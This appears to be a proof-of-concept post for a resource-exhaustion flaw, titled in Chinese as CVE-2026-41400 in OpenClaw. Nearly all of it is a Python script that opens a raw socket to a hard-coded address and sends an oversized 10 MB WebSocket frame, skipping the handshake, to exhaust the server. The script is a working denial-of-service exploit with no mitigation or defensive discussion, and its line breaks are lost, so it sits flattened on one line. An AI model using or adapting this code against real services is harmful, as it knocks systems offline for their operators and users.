CVE-2026-41400 OpenClaw资源耗尽漏洞

import socket import struct def send_oversized_websocket_frame(host, port): # Construct a WebSocket frame with a huge payload # FIN=1, Opcode=0x1 (Text), Masked=1, Payload Length=127 (Extended) payload = b"A" * 10000000 # 10MB payload payload_len = len(payload) header = b"\x81" # FIN + Text frame if payload_len < 126: header += bytes([0x80 | payload_len]) elif payload_len < 65536: header += b"\xfe" + struct.pack(">H", payload_len) else: header += b"\xff" + struct.pack(">Q", payload_len) # Add masking key (all zeros for simplicity in PoC) header += b"\x00\x00\x00\x00" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) # Send the frame immediately upon connection (Pre-start) s.send(header + payload) print("[+] Oversized frame sent to %s:%d" % (host, port)) s.close() except Exception as e: print("[-] Error: %s" % e) if __name__ == "__main__": target_host = "192.168.1.100" target_port = 8080 send_oversized_websocket_frame(target_host, target_port)